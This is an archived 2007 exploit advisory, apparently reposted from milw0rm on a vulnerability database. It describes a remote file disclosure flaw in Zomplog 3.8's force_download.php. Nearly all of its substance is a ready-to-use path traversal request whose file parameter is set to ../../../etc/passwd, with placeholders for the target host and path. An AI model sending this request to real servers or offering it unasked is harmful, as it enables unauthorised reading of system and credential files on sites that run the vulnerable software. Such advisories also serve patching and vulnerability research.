Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16772
HistoryApr 19, 2007 - 12:00 a.m.

Zomplog 3.8 (force_download.php file) Remote File Disclosure Vuln

2007-04-1900:00:00
vulners.com
35

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •                                          Y! Underground Group                                                +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •      Portal......:  Zomplog v3.8                                                                             +
    
  •      Author......:  Dj7xpl / [email protected]                                                                +
    
  •      Type........:  Remote File Disclosure Vulnerability                                                     +
    
  •      Download....:  www.zomp.nl/zomplog                                                                      +
    
  •      Page........:  http://Dj7xpl.2600.ir                                                                    +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  •                                                                                                              +
    
  •      Bug.........:  http://[Target]/[Path]/upload/force_download.php?file=[Local Path]                       +
    
  •      E.g.........:  http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd                +
    
  •                                                                                                              +
    

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=–=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

milw0rm.com [2007-04-18]